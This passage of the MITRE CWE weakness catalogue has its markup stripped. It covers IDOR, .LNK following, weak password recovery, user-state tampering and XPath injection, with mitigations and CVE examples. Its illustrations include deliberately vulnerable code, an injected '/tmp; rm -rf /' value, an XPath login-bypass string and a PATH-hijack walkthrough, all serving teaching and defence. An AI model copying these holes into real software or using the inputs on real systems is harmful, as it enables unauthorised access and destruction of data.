because complex data specifications result in complex validation code. Complex tasks and systems may also need to be guarded by complex security checks, so simple systems should be preferred. - - - - - - Primary - - - - - - - - Unnecessary Complexity - - - - - Architecture and Design - - - Implementation - - - Operation - - - - - Other - Other - - - - - Architecture and Design - Avoid complex security mechanisms when simpler ones would meet requirements. Avoid complex data models, and unnecessarily complex operations. Adopt architectures that provide guarantees, simplify understanding through elegance and abstraction, and that can be implemented similarly. Modularize, isolate and do not trust complex code, and apply other secure programming principles on these modules (e.g., least privilege) to mitigate vulnerabilities. - - - - - The IPSEC specification is complex, which resulted in bugs, partial implementations, and incompatibilities between vendors. - - - HTTP Request Smuggling (CWE-444) attacks are feasible because there are not stringent requirements for how illegal or inconsistent HTTP headers should be handled. This can lead to inconsistent implementations in which a proxy or firewall interprets the same data stream as a different set of requests than the end points in that stream. - - - - - CVE-2007-6067 - Support for complex regular expressions leads to a resultant algorithmic complexity weakness (CWE-407). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6067 - - - CVE-2007-1552 - Either a filename extension and a Content-Type header could be used to infer the file type, but the developer only checks the Content-Type, enabling unrestricted file upload (CWE-434). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1552 - - - CVE-2007-6479 - In Apache environments, a "filename.php.gif" can be redirected to the PHP interpreter instead of being sent as an image/gif directly to the user. Not knowing this, the developer only checks the last extension of a submitted filename, enabling arbitrary code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6479 - - - CVE-2005-2148 - The developer cleanses the $_REQUEST superglobal array, but PHP also populates $_GET, allowing attackers to bypass the protection mechanism and conduct SQL injection attacks against code that uses $_GET. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2148 - - - - - - - - - Pascal Meunier - Purdue University - 2008-01-18 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-01-12 - updated Description, Name - - - CWE Content Team - MITRE - 2010-12-13 - updated Name, Research_Gaps - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Design Principle Violation: Not Using Economy of Mechanism - Failure to Use Economy of Mechanism - - - - The software does not perform access checks on a resource every time the resource is accessed by an entity, which can create resultant weaknesses if that entity's rights or privileges change over time. - - - - - - - Primary - - - - - - - - Architecture and Design - - - Implementation - - - Operation - - - - - Integrity - Confidentiality - Availability - Access Control - Other - Gain Privileges or Assume Identity - Execute Unauthorized Code or Commands - Bypass Protection Mechanism - Read Application Data - Other - A user might retain access to a critical resource even after privileges have been revoked, possibly allowing access to privileged functionality or sensitive information, depending on the role of the resource. - - - - - Architecture and Design - Invalidate cached privileges, file handles or descriptors, or other access credentials whenever identities, processes, policies, roles, capabilities or permissions change. Perform complete authentication checks before accepting, caching and reusing data, dynamic content and code (scripts). Avoid caching access control decisions as much as possible. - - - Architecture and Design - Identify all possible code paths that might access sensitive resources. If possible, create and use a single interface that performs the access checks, and develop code standards that require use of this interface. - - - - - When executable library files are used on web servers, which is common in PHP applications, the developer might perform an access check in any user-facing executable, and omit the access check from the library file itself. By directly requesting the library file (CWE-425), an attacker can bypass this access check. - - - When a developer begins to implement input validation for a web application, often the validation is performed in each area of the code that uses externally-controlled input. In complex applications with many inputs, the developer often misses a parameter here or a cookie there. One frequently-applied solution is to centralize all input validation, store these validated inputs in a separate data structure, and require that all access of those inputs must be through that data structure. An alternate approach would be to use an external input validation framework such as Struts, which performs the validation before the inputs are ever processed by the code. - - - - - CVE-2007-0408 - Server does not properly validate client certificates when reusing cached connections. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0408 - - - - - SFP20 - Race Condition Window - - - - - - - - - - - - Pascal Meunier - Purdue University - 2008-01-18 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Observed_Example, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-01-12 - updated Description, Name - - - CWE Content Team - MITRE - 2009-05-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-12-13 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Design Principle Violation: Not Using Complete Mediation - Failure to Use Complete Mediation - - - - The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data. - - Retrieval of a user record occurs in the system based on some key value that is under user control. The key would typically identify a user-related record stored in the system and would be used to lookup that record for presentation to the user. It is likely that an attacker would have to be an authenticated user in the system. However, the authorization process would not properly check the data access operation to ensure that the authenticated user performing the operation has sufficient entitlements to perform the requested data access, hence bypassing any other authorization checks present in the system. - For example, attackers can look at places where user specific data is retrieved (e.g. search screens) and determine whether the key for the item being looked up is controllable externally. The key may be a hidden field in the HTML form field, might be passed as a URL parameter or as an unencrypted cookie variable, then in each of these cases it will be possible to tamper with the key value. - One manifestation of this weakness is when a system uses sequential or otherwise easily-guessable session IDs that would allow one user to easily switch to another user's session and read/modify their data. - - - - - - - - - - - - Insecure Direct Object Reference / IDOR - The "Insecure Direct Object Reference" term, as described in the OWASP Top Ten, is broader than this CWE because it also covers path traversal (CWE-22). Within the context of vulnerability theory, there is a similarity between the OWASP concept and CWE-706: Use of Incorrectly-Resolved Name or Reference. - - - Broken Object Level Authorization / BOLA - BOLA is used in the 2019 OWASP API Security Top 10 and is said to be the same as IDOR. - - - Horizontal Authorization - "Horizontal Authorization" is used to describe situations in which two users have the same privilege level, but must be prevented from accessing each other's resources. This is fairly common when using key-based access to resources in a multi-user context. - - - - - Architecture and Design - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - High - - - Access Control - Bypass Protection Mechanism - Access control checks for specific user data or functionality can be bypassed. - - - Access Control - Gain Privileges or Assume Identity - Horizontal escalation of privilege is possible (one user can view/modify information of another user). - - - Access Control - Gain Privileges or Assume Identity - Vertical escalation of privilege is possible if the user-controlled key is actually a flag that indicates administrator status, allowing the attacker to gain administrative access. - - - - - Architecture and Design - For each and every data access, ensure that the user has sufficient privilege to access the record that is being requested. - - - Architecture and Design - Implementation - Make sure that the key that is used in the lookup of a specific user's record is not controllable externally by the user or that any tampering can be detected. - - - Architecture and Design - Use encryption in order to make it more difficult to guess other legitimate values of the key or associate a digital signature with the key so that the server can verify that there has been no tampering. - - - - - Evgeny Lebanidze - Cigital - 2008-01-30 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Type - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2010-06-21 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Alternate_Terms, Applicable_Platforms, Description, Name, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Alternate_Terms, Common_Consequences - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Alternate_Terms - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Alternate_Terms - - Access Control Bypass Through User-Controlled Key - - - - The software, when opening a file or directory, does not sufficiently handle when the file is a Windows shortcut (.LNK) whose target is outside of the intended control sphere. This could allow an attacker to cause the software to operate on unauthorized files. - The shortcut (file with the .lnk extension) can permit an attacker to read/write a file that they originally did not have permissions to access. - - - - - - Resultant - - - - - - - - - Windows symbolic link following - - - symlink - - - - - Operation - - - Low - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Architecture and Design - Separation of Privilege - - Follow the principle of least privilege when assigning access rights to entities in a software system. - Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted. - - - - - - CVE-2000-0342 - Mail client allows remote attackers to bypass the user warning for executable attachments such as .exe, .com, and .bat by using a .lnk file that refers to the attachment, aka "Stealth Attachment." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0342 - - - CVE-2001-1042 - FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1042 - - - CVE-2001-1043 - FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1043 - - - CVE-2005-0587 - Browser allows remote malicious web sites to overwrite arbitrary files by tricking the user into downloading a .LNK (link) file twice, which overwrites the file that was referenced in the first .LNK file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0587 - - - CVE-2001-1386 - ".LNK." - .LNK with trailing dot - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1386 - - - CVE-2003-1233 - Rootkits can bypass file access restrictions to Windows kernel directories using NtCreateSymbolicLinkObject function to create symbolic link - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1233 - - - - - Windows Shortcut Following (.LNK) - - - FIO05-C - Identify files using multiple file attributes - - - SFP18 - Link in resource name resolution - - - - Under-studied. Windows .LNK files are more "portable" than Unix symlinks and have been used in remote exploits. Some Windows API's will access LNK's as if they are regular files, so one would expect that they would be reported more frequently. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak. - - It is common for an application to have a mechanism that provides a means for a user to gain access to their account in the event they forget their password. Very often the password recovery mechanism is weak, which has the effect of making it more likely that it would be possible for a person other than the legitimate system user to gain access to that user's account. Weak password recovery schemes completely undermine a strong password authentication scheme. - This weakness may be that the security question is too easy to guess or find an answer to (e.g. because the question is too common, or the answers can be found using social media). Or there might be an implementation weakness in the password recovery mechanism code that may for instance trick the system into e-mailing the new password to an e-mail account other than that of the user. There might be no throttling done on the rate of password resets so that a legitimate user can be denied service by an attacker if an attacker tries to recover their password in a rapid succession. The system may send the original password to the user rather than generating a new temporary password. In summary, password recovery functionality, if not carefully designed and implemented can often become the system's weakest link that can be misused in a way that would allow an attacker to gain unauthorized access to the system. - - - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - Implementation - - - High - - - Access Control - Gain Privileges or Assume Identity - An attacker could gain unauthorized access to the system by retrieving legitimate user's authentication credentials. - - - Availability - DoS: Resource Consumption (Other) - An attacker could deny service to legitimate system users by launching a brute force attack on the password recovery mechanism using user ids of legitimate users. - - - Integrity - Other - Other - The system's security functionality is turned against the system by the attacker. - - - - - Architecture and Design - Make sure that all input supplied by the user to the password recovery mechanism is thoroughly filtered and validated. - - - Architecture and Design - Do not use standard weak security questions and use several security questions. - - - Architecture and Design - Make sure that there is throttling on the number of incorrect answers to a security question. Disable the password recovery functionality after a certain (small) number of incorrect guesses. - - - Architecture and Design - Require that the user properly answers the security question prior to resetting their password and sending the new password to the e-mail address of record. - - - Architecture and Design - Never allow the user to control what e-mail address the new password will be sent to in the password recovery mechanism. - - - Architecture and Design - Assign a new temporary password rather than revealing the original password. - - - - - A famous example of this type of weakness being exploited is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder's account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction. - - - - - 49 - Insufficient Password Recovery - - - - - - - - - - This entry might be reclassified as a category or "loose composite," since it lists multiple specific errors that can make the mechanism weak. However, under view 1000, it could be a weakness under protection mechanism failure, although it is different from most PMF issues since it is related to a feature that is designed to bypass a protection mechanism (specifically, the lack of knowledge of a password). - This entry probably needs to be split; see extended description. - - - - Evgeny Lebanidze - Cigital - 2008-01-30 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Description, Maintenance_Notes, Name, Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-12-13 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - Weak Password Recovery Mechanism - - - - The application constructs the name of a file or other resource using input from an upstream component, but it does not restrict or incorrectly restricts the resulting name. - This may produce resultant weaknesses. For instance, if the names of these resources contain scripting characters, it is possible that a script may get executed in the client's browser if the application ever displays the name of the resource on a dynamically generated web page. Alternately, if the resources are consumed by some application parser, a specially crafted name can exploit some vulnerability internal to the parser, potentially resulting in execution of arbitrary code on the server machine. The problems will vary based on the context of usage of such malformed resource names and whether vulnerabilities are present in or assumptions are made by the targeted technology that would make code execution possible. - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Low - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - Execution of arbitrary code in the context of usage of the resources with dangerous names. - - - Confidentiality - Availability - Read Application Data - DoS: Crash, Exit, or Restart - Crash of the consumer code of these resources resulting in information leakage or denial of service. - - - - - Architecture and Design - Do not allow users to control names of resources used on the server side. - - - Architecture and Design - Perform allowlist input validation at entry points and also before consuming the resources. Reject bad file names rather than trying to cleanse them. - - - Architecture and Design - Make sure that technologies consuming the resources are not vulnerable (e.g. buffer overflow, format string, etc.) in a way that would allow code execution if the name of the resource is malformed. - - - - - SFP24 - Tainted input to command - - - - - Evgeny Lebanidze - Cigital - 2008-01-30 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Name, Type - - - CWE Content Team - MITRE - 2010-12-13 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations, Relationships - - Insufficient Filtering of File and Other Resource Names for Executable Content - - - - The software stores security-critical state information about its users, or the software itself, in a location that is accessible to unauthorized actors. - - If an attacker can modify the state information without detection, then it could be used to perform unauthorized actions or access unexpected resources, since the application programmer does not expect that the state can be changed. - State information can be stored in various locations such as a cookie, in a hidden web form field, input parameter or argument, an environment variable, a database record, within a settings file, etc. All of these locations have the potential to be modified by an attacker. When this state information is used to control security or determine resource usage, then it may create a vulnerability. For example, an application may perform authentication, then save the state in an "authenticated=true" cookie. An attacker may simply create this cookie in order to bypass the authentication. - - - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - High - - - Access Control - Bypass Protection Mechanism - Gain Privileges or Assume Identity - An attacker could potentially modify the state in malicious ways. If the state is related to the privileges or level of authentication that the user has, then state modification might allow the user to bypass authentication or elevate privileges. - - - Confidentiality - Read Application Data - The state variables may contain sensitive information that should not be known by the client. - - - Availability - DoS: Crash, Exit, or Restart - By modifying state variables, the attacker could violate the application's expectations for the contents of the state, leading to a denial of service due to an unexpected error condition. - - - - - Architecture and Design - Understand all the potential locations that are accessible to attackers. For example, some programmers assume that cookies and hidden form fields cannot be modified by an attacker, or they may not consider that environment variables can be modified before a privileged program is invoked. - - - Architecture and Design - Attack Surface Reduction - - Store state information and sensitive data on the server side only. - Ensure that the system definitively and unambiguously keeps track of its own state and user state and has rules defined for legitimate state transitions. Do not allow any application user to affect state directly in any way other than through legitimate actions leading to state transitions. - If information must be stored on the client, do not do so without encryption and integrity checking, or otherwise having a mechanism on the server side to catch tampering. Use a message authentication code (MAC) algorithm, such as Hash Message Authentication Code (HMAC) [REF-529]. Apply this against the state or sensitive data that you has to be exposed, which can guarantee the integrity of the data - i.e., that the data has not been modified. Ensure that a strong hash function is used (CWE-328). - - - - Architecture and Design - Store state information on the server side only. Ensure that the system definitively and unambiguously keeps track of its own state and user state and has rules defined for legitimate state transitions. Do not allow any application user to affect state directly in any way other than through legitimate actions leading to state transitions. - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - With a stateless protocol such as HTTP, use some frameworks can maintain the state for you. - Examples include ASP.NET View State and the OWASP ESAPI Session Management feature. - Be careful of language features that provide state support, since these might be provided as a convenience to the programmer and may not be considering security. - - - - Architecture and Design - For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. - - - Operation - Implementation - Environment Hardening - When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues. - - - Testing - Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible. - - - Testing - Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - - - Testing - Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. - - - - - In the following example, an authentication flag is read from a browser cookie, thus allowing for external control of user state data. - - Cookie[] cookies = request.getCookies();for (int i =0; i< cookies.length; i++) {Cookie c = cookies[i];if (c.getName().equals("authenticated") && Boolean.TRUE.equals(c.getValue())) {authenticated = true;}} - - - - The following code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as "../../tomcat/conf/server.xml", which causes the application to delete one of its own configuration files (CWE-22). - - String rName = request.getParameter("reportName");File rFile = new File("/usr/local/apfr/reports/" + rName);...rFile.delete(); - - - - The following code uses input from a configuration file to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can change the configuration file, they can use the program to read any file on the system that ends with the extension .txt. - - fis = new FileInputStream(cfg.getProperty("sub")+".txt");amt = fis.read(arr);out.println(arr); - - - - This program is intended to execute a command that lists the contents of a restricted directory, then performs other actions. Assume that it runs with setuid privileges in order to bypass the permissions check by the operating system. - - #define DIR "/restricted/directory" - char cmd[500];sprintf(cmd, "ls -l %480s", DIR); - /* Raise privileges to those needed for accessing DIR. */ - - RaisePrivileges(...);system(cmd);DropPrivileges(...);... - - This code may look harmless at first, since both the directory and the command are set to fixed values that the attacker can't control. The attacker can only see the contents for DIR, which is the intended program behavior. Finally, the programmer is also careful to limit the code that executes with raised privileges. - However, because the program does not modify the PATH environment variable, the following attack would work: - - - The user sets the PATH to reference a directory under the attacker's control, such as "/my/dir/". - The attacker creates a malicious program called "ls", and puts that program in /my/dir - The user executes the program. - When system() is executed, the shell consults the PATH to find the ls program - The program finds the attacker's malicious program, "/my/dir/ls". It doesn't find "/bin/ls" because PATH does not contain "/bin/". - The program executes the attacker's malicious program with the raised privileges. - - - - - The following code segment implements a basic server that uses the "ls" program to perform a directory listing of the directory that is listed in the "HOMEDIR" environment variable. The code intends to allow the user to specify an alternate "LANG" environment variable. This causes "ls" to customize its output based on a given language, which is an important capability when supporting internationalization. - - $ENV{"HOMEDIR"} = "/home/mydir/public/";my $stream = AcceptUntrustedInputStream();while (<$stream>) { - chomp;if (/^ENV ([\w\_]+) (.*)/) {$ENV{$1} = $2;}elsif (/^QUIT/) { ... }elsif (/^LIST/) {open($fh, "/bin/ls -l $ENV{HOMEDIR}|");while (<$fh>) {SendOutput($stream, "FILEINFO: $_");}close($fh);} - } - - The programmer takes care to call a specific "ls" program and sets the HOMEDIR to a fixed value. However, an attacker can use a command such as "ENV HOMEDIR /secret/directory" to specify an alternate directory, enabling a path traversal attack (CWE-22). At the same time, other attacks are enabled as well, such as OS command injection (CWE-78) by setting HOMEDIR to a value such as "/tmp; rm -rf /". In this case, the programmer never intends for HOMEDIR to be modified, so input validation for HOMEDIR is not the solution. A partial solution would be an allowlist that only allows the LANG variable to be specified in the ENV command. Alternately, assuming this is an authenticated user, the language could be stored in a local file so that no ENV command at all would be needed. - While this example may not appear realistic, this type of problem shows up in code fairly frequently. See CVE-1999-0073 in the observed examples for a real-world example with similar behaviors. - - - - - CVE-2005-2428 - Mail client stores password hashes for unrelated accounts in a hidden form field. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2428 - - - CVE-2008-0306 - Privileged program trusts user-specified environment variable to modify critical configuration settings. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0306 - - - CVE-1999-0073 - Telnet daemon allows remote clients to specify critical environment variables for the server, leading to code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0073 - - - CVE-2007-4432 - Untrusted search path vulnerability through modified LD_LIBRARY_PATH environment variable. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4432 - - - CVE-2006-7191 - Untrusted search path vulnerability through modified LD_LIBRARY_PATH environment variable. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7191 - - - CVE-2008-5738 - Calendar application allows bypass of authentication by setting a certain cookie value to 1. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5738 - - - CVE-2008-5642 - Setting of a language preference in a cookie enables path traversal attack. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5642 - - - CVE-2008-5125 - Application allows admin privileges by setting a cookie value to "admin." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5125 - - - CVE-2008-5065 - Application allows admin privileges by setting a cookie value to "admin." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5065 - - - CVE-2008-4752 - Application allows admin privileges by setting a cookie value to "admin." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4752 - - - CVE-2000-0102 - Shopping cart allows price modification via hidden form field. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0102 - - - CVE-2000-0253 - Shopping cart allows price modification via hidden form field. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0253 - - - CVE-2008-1319 - Server allows client to specify the search path, which can be modified to point to a program that the client has uploaded. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1319 - - - - - SFP23 - Exposed Data - - - - - - - - - - - - - - Evgeny Lebanidze - Cigital - 2008-01-30 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-01-12 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, References, Relationships, Relevant_Properties, Type - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-07-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-02-16 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, References, Relationships, Relevant_Properties - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - Insufficient Management of User State - External Control of User State Data - - - - The software uses external input to dynamically construct an XPath expression used to retrieve data from an XML database, but it does not neutralize or incorrectly neutralizes that input. This allows an attacker to control the structure of the query. - The net effect is that the attacker will have control over the information selected from the XML database and may use that ability to control application flow, modify logic, retrieve unauthorized data, or bypass important checks (e.g. authentication). - - - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - High - - - Access Control - Bypass Protection Mechanism - Controlling application flow (e.g. bypassing authentication). - - - Confidentiality - Read Application Data - The attacker could read restricted XML content. - - - - - Implementation - Use parameterized XPath queries (e.g. using XQuery). This will help ensure separation between data plane and control plane. - - - Implementation - Properly validate user input. Reject data where appropriate, filter where appropriate and escape where appropriate. Make sure input that will be used in XPath queries is safe in that context. - - - - - Consider the following simple XML document that stores authentication information and a snippet of Java code that uses XPath query to retrieve authentication information: - - <users><user><login>john</login><password>abracadabra</password><home_dir>/home/john</home_dir></user><user><login>cbc</login><password>1mgr8</password><home_dir>/home/cbc</home_dir></user></users> - - The Java code used to retrieve the home directory based on the provided credentials is: - - XPath xpath = XPathFactory.newInstance().newXPath();XPathExpression xlogin = xpath.compile("//users/user[login/text()='" + login.getUserName() + "' and password/text() = '" + login.getPassword() + "']/home_dir/text()");Document d = DocumentBuilderFactory.newInstance().newDocumentBuilder().parse(new File("db.xml"));String homedir = xlogin.evaluate(d); - - Assume that user "john" wishes to leverage XPath Injection and login without a valid password. By providing a username "john" and password "' or ''='" the XPath expression now becomes - - //users/user[login/text()='john' or ''='' and password/text() = '' or ''='']/home_dir/text() - - which, of course, lets user "john" login without a valid password, thus bypassing authentication. - - - - - 39 - XPath Injection - - - SFP24 - Tainted input to command - - - - - - - - This weakness is similar to other weaknesses that enable injection style attacks, such as SQL injection, command injection and LDAP injection. The main difference is that the target of attack here is the XML database. - - - - Evgeny Lebanidze - Cigital - 2008-01-30 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2008-10-14 